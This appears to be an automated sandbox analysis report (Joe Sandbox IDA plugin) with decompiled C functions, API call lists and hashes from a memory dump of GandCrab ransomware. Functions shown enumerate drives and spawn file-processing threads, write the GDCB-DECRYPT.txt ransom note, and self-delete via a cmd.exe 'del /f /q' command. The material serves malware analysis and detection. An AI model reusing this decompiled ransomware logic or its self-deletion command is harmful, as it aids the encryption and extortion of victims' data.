					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

0x0f1d7140
0x0f1d7148
0x0f1d714a
0x0f1d714e
0x0f1d7153
0x0f1d7161
0x0f1d7164
0x0f1d7169
0x0f1d7169
0x0f1d716f
0x0f1d7179
0x0f1d7180
0x0f1d7184
0x0f1d7187
0x0f1d7187
0x0f1d718d
0x0f1d719b
0x0f1d719d
0x0f1d71a5
0x0f1d71a8
0x0f1d71a8
0x0f1d71ae
0x0f1d71bc
0x0f1d71be
0x0f1d71c6
0x0f1d71c9
0x0f1d71c9
0x0f1d71cf
0x0f1d71dd
0x0f1d71df
0x0f1d71e7
0x0f1d71ea
0x0f1d71ea
0x0f1d71f0
0x0f1d71fe
0x0f1d7200
0x0f1d7208
0x0f1d720b
0x0f1d720b
0x0f1d7211
0x0f1d721f
0x0f1d7221
0x0f1d7229
0x0f1d722c
0x0f1d722c
0x0f1d7232
0x0f1d7240
0x0f1d7242
0x0f1d724a
0x0f1d724d
0x0f1d724d
0x0f1d7253
0x0f1d7255
0x0f1d7255
0x0f1d725c
0x0f1d726a
0x0f1d726c
0x0f1d7274
0x0f1d7277
0x0f1d7277
0x0f1d7280
0x0f1d72ac
0x0f1d7282
0x0f1d7288
0x0f1d72a6
0x0f1d72a6

APIs

lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7192
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D719D
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71B3
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71BE
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71D4
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71DF
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71F5
lstrlenW.KERNEL32(0F1D4966,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7200
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7216
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7221
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7237
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7242
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7261
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D726C
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7288
lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7296

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 402524172551fe850c8c014c78f6f6c66eb0dc5339ebe5adb6c4efd0ee259fdd
Instruction ID: 4919b8e81a67e1518409c89982140a53cecebba08a4301cf9b230b7963492913
Opcode Fuzzy Hash: 402524172551fe850c8c014c78f6f6c66eb0dc5339ebe5adb6c4efd0ee259fdd
Instruction Fuzzy Hash: 3F410332102652EFC7119FB8DD8C794B7B1FF04366F088539E41682A62D776B4B8DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D53A0 Relevance: 18.1, APIs: 12, Instructions: 92
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D53A0(WCHAR* __ecx) {
				CHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _t22;
				void* _t24;
				signed int _t26;
				int _t30;
				char _t32;
				void* _t33;
				signed char _t34;
				CHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t38;
				void* _t39;
				CHAR* _t40;

				_t37 = __ecx;
				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
				_v20 = _t39;
				GetModuleFileNameW(0, _t39, 0x200);
				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
				_v16 = _t33;
				if(_t33 != 0xffffffff) {
					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
					_v24 = _t22;
					if(_t22 != 0) {
						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
						_v12 = _t24;
						if(_t24 != 0) {
							_t5 = _t24 + 0x4e; // 0x4e
							_t40 = _t5;
							_v8 = _t40;
							_t26 = lstrlenW(_t37);
							_t34 = 0;
							_t38 =  &(_t37[_t26]);
							if(lstrlenA(_t40) + _t27 != 0) {
								_t36 = _t40;
								do {
									if((_t34 & 0x00000001) != 0) {
										 *((char*)(_t38 + _t34)) = 0;
									} else {
										_t32 =  *_t40;
										_t40 =  &(_t40[1]);
										 *((char*)(_t38 + _t34)) = _t32;
									}
									_t34 = _t34 + 1;
									_t30 = lstrlenA(_t36);
									_t36 = _v8;
								} while (_t34 < _t30 + _t30);
							}
							UnmapViewOfFile(_v12);
							_t33 = _v16;
							_t39 = _v20;
						}
						CloseHandle(_v24);
					}
					CloseHandle(_t33);
				}
				return VirtualFree(_t39, 0, 0x8000);
			}

0x0f1d53b7
0x0f1d53bf
0x0f1d53c9
0x0f1d53cc
0x0f1d53eb
0x0f1d53ed
0x0f1d53f3
0x0f1d5404
0x0f1d540a
0x0f1d540f
0x0f1d541a
0x0f1d5420
0x0f1d5425
0x0f1d5427
0x0f1d5427
0x0f1d542b
0x0f1d542e
0x0f1d5435
0x0f1d5437
0x0f1d5442
0x0f1d5444
0x0f1d5446
0x0f1d5449
0x0f1d5453
0x0f1d544b
0x0f1d544b
0x0f1d544d
0x0f1d544e
0x0f1d544e
0x0f1d5458
0x0f1d5459
0x0f1d545f
0x0f1d5464
0x0f1d5446
0x0f1d546b
0x0f1d5471
0x0f1d5474
0x0f1d5474
0x0f1d547a
0x0f1d547a
0x0f1d5481
0x0f1d5481
0x0f1d549b

APIs

VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,772D81D0,00000000,?,?,?,?,0F1D55B2), ref: 0F1D53B9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F1D55B2), ref: 0F1D53CC
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,0F1D55B2), ref: 0F1D53E5
CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,0F1D55B2), ref: 0F1D5404
MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,0F1D55B2), ref: 0F1D541A
lstrlenW.KERNEL32(?,?,?,?,?,0F1D55B2), ref: 0F1D542E
lstrlenA.KERNEL32(0000004E,?,?,?,?,0F1D55B2), ref: 0F1D543A
lstrlenA.KERNEL32(0000004E,?,?,?,?,0F1D55B2), ref: 0F1D5459
UnmapViewOfFile.KERNEL32(?,?,?,?,?,0F1D55B2), ref: 0F1D546B
CloseHandle.KERNEL32(?,?,?,?,?,0F1D55B2), ref: 0F1D547A
CloseHandle.KERNEL32(00000000,?,?,?,?,0F1D55B2), ref: 0F1D5481
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F1D55B2), ref: 0F1D548F

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
String ID:
API String ID: 869890170-0
Opcode ID: 6a4aa7eae535a28f6c2d2406307244bac29417a6a6f8c1c173cd9238119ea873
Instruction ID: 61eda20ee470e6485e815c6a2066208e5cf3f2ca017dee5108242859e2858c8f
Opcode Fuzzy Hash: 6a4aa7eae535a28f6c2d2406307244bac29417a6a6f8c1c173cd9238119ea873
Instruction Fuzzy Hash: BD31F670782315BBE7208FA49C4AF9D7B7CAF05B12F244114F701BA1C2DBB8A560CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D6BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D6BE0(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xf1e2a64; // 0x1f2000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xf1e2a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0f1d6bfb
0x0f1d6c03
0x0f1d6c25
0x0f1d6c2a
0x0f1d6c3e
0x0f1d6c45
0x0f1d6c5e
0x0f1d6c5e
0x0f1d6c65
0x0f1d6c6b
0x0f1d6c2c
0x0f1d6c39
0x0f1d6c39
0x0f1d6c78
0x0f1d6c86

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F1D6CC2,00000000,?,?), ref: 0F1D6BF5
wsprintfW.USER32 ref: 0F1D6C03
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F1D6C1F
GetLastError.KERNEL32(?,?), ref: 0F1D6C2C
lstrlenW.KERNEL32(001F2000,?,00000000,?,?), ref: 0F1D6C4E
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0F1D6C5E
CloseHandle.KERNEL32(00000000,?,?), ref: 0F1D6C65
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F1D6C78

Strings

%s\GDCB-DECRYPT.txt, xrefs: 0F1D6BFD

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\GDCB-DECRYPT.txt
API String ID: 2985722263-4054134092
Opcode ID: 5757f1db1b9007408e73841ff0c96186df1e62be5f0cbad7a18769bc77c337be
Instruction ID: 5443731f5afbe871ae4e51537bfd6a18e78e0045f3bdd85da539a359376226e4
Opcode Fuzzy Hash: 5757f1db1b9007408e73841ff0c96186df1e62be5f0cbad7a18769bc77c337be
Instruction Fuzzy Hash: 5901B5713833107BF2305B64AD8AF6A367CDF45B66F100114FB05E91C2DBAD69608669

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D5190 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D5190() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x0f1d51b6
0x0f1d51ba
0x0f1d51be
0x0f1d51c8
0x0f1d51d0
0x0f1d51d9
0x0f1d51f3
0x0f1d51f3
0x0f1d51d0
0x0f1d51fb

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F1D5392,00000000), ref: 0F1D51A6
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F1D51B8
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0F1D51C8
wsprintfW.USER32 ref: 0F1D51D9
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F1D51F3
ExitProcess.KERNEL32 ref: 0F1D51FB

Strings

open, xrefs: 0F1D51EC
cmd.exe, xrefs: 0F1D51E7
/c timeout -c 5 & del "%s" /f /q, xrefs: 0F1D51D3

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: 176f5d04cc0c838e5ea4aeee55e5cad6b153cea9b592428a2f5daf7a637461e0
Instruction ID: d5d836ca8d3be202699167b2e8aadd418779f9420abc62bbe021c8b3cf6ef3c7
Opcode Fuzzy Hash: 176f5d04cc0c838e5ea4aeee55e5cad6b153cea9b592428a2f5daf7a637461e0
Instruction Fuzzy Hash: 0BF015367C332172F22166645C0BF0B2E3C9F85F26F280004B709BE1C38AE8666186A9

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D2C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F1D2C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xf1df290; // 0x21
				asm("movdqu xmm0, [0xf1df280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0F1D2AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

0x0f1d2c59
0x0f1d2c5e
0x0f1d2c66
0x0f1d2c69
0x0f1d2c70
0x0f1d2c76
0x0f1d2c79
0x0f1d2ce9
0x0f1d2cf2
0x0f1d2d01
0x0f1d2c7b
0x0f1d2c7e
0x0f1d2c9f
0x0f1d2cbd
0x0f1d2ccb
0x0f1d2cd7
0x0f1d2c80
0x0f1d2c94
0x0f1d2c94
0x0f1d2c7e

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0F1D2C8A
BeginPaint.USER32(?,?), ref: 0F1D2C9F
lstrlenW.KERNEL32(?), ref: 0F1D2CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F1D2CBD
EndPaint.USER32(?,?), ref: 0F1D2CCB
CreateThread.KERNEL32 ref: 0F1D2CE9
DestroyWindow.USER32(?), ref: 0F1D2CF2

Strings

GandCrab!, xrefs: 0F1D2C5E

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: d972160a8cb9b5f3b0ad9db3a2ee457721cb688bbbdf4e17f7ebb607b91fc2bf
Instruction ID: 58179315fa11c7bd2b2bf78bb78118771fd6a44fea17d79408cc9afcd7229041
Opcode Fuzzy Hash: d972160a8cb9b5f3b0ad9db3a2ee457721cb688bbbdf4e17f7ebb607b91fc2bf
Instruction Fuzzy Hash: 7F11B232206209ABD711DF68DC09FAA7BBCFF48322F00461AFD51D6191E7719AB0CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D3E20 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F1D3E20(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xf1df348; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F1D6DE0, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0F1D5670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

0x0f1d3e26
0x0f1d3e38
0x0f1d3e3c
0x0f1d3e40
0x0f1d3e4b
0x0f1d3e4e
0x0f1d3e50
0x0f1d3e53
0x0f1d3e58
0x0f1d3e5c
0x0f1d3e61
0x0f1d3e6b
0x0f1d3e6f
0x0f1d3e76
0x0f1d3e80
0x0f1d3e84
0x0f1d3e8a
0x0f1d3e93
0x0f1d3ea2
0x0f1d3ea5
0x0f1d3eb2
0x0f1d3eb5
0x0f1d3ebb
0x0f1d3ec2
0x0f1d3ecf
0x0f1d3ed3
0x0f1d3ed4
0x0f1d3ed4
0x0f1d3ed7
0x0f1d3ed8
0x0f1d3ee6
0x0f1d3eea
0x0f1d3eed
0x0f1d3ef7
0x0f1d3eff
0x0f1d3f05
0x0f1d3f0b
0x0f1d3f11
0x0f1d3f1b
0x0f1d3f22
0x0f1d3f26
0x0f1d3f2a
0x0f1d3f2c
0x0f1d3f34
0x0f1d3f3d
0x0f1d3f9c
0x0f1d3fa0
0x0f1d3f3f
0x0f1d3f3f
0x0f1d3f42
0x0f1d3f48
0x0f1d3f4f
0x0f1d3f50
0x0f1d3f57
0x0f1d3f5b
0x0f1d3f60
0x0f1d3f67
0x0f1d3f6a
0x0f1d3f6e
0x0f1d3f78
0x0f1d3f7a
0x0f1d3f7e
0x0f1d3f81
0x0f1d3f84
0x0f1d3f84
0x0f1d3f84
0x0f1d3f8a
0x0f1d3f8e
0x0f1d3f92
0x0f1d3f96
0x0f1d3f96
0x0f1d3fa6
0x0f1d3fca
0x0f1d3fa8
0x0f1d3fa8
0x0f1d3fb2
0x0f1d3fb6
0x0f1d3fbd
0x0f1d3fd4
0x0f1d3fd8
0x0f1d3ff6

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F1D3E40
GetTickCount.KERNEL32 ref: 0F1D3E65
GetDriveTypeW.KERNEL32(?), ref: 0F1D3E8A
CreateThread.KERNEL32 ref: 0F1D3EC9
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F1D3F0B
GetTickCount.KERNEL32 ref: 0F1D3F11

Strings

?:\, xrefs: 0F1D3E53

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 8bca950a97cb4e51bbfa9846a68179d3f74fec46839c64c8de48a8b39ee46259
Instruction ID: 07512db2323aba47ecbeadfdda7f36831a2f5b31000f4c41af1ffbfd73c39933
Opcode Fuzzy Hash: 8bca950a97cb4e51bbfa9846a68179d3f74fec46839c64c8de48a8b39ee46259
Instruction Fuzzy Hash: 125134709093009FC314CF18C888B5ABBF5FF88325F504A2DFA999B391D375A994CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D6DE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D6DE0(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0F1D6C90(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x0f1d6df9
0x0f1d6dff
0x0f1d6e0e
0x0f1d6e1c
0x0f1d6e30
0x0f1d6e38
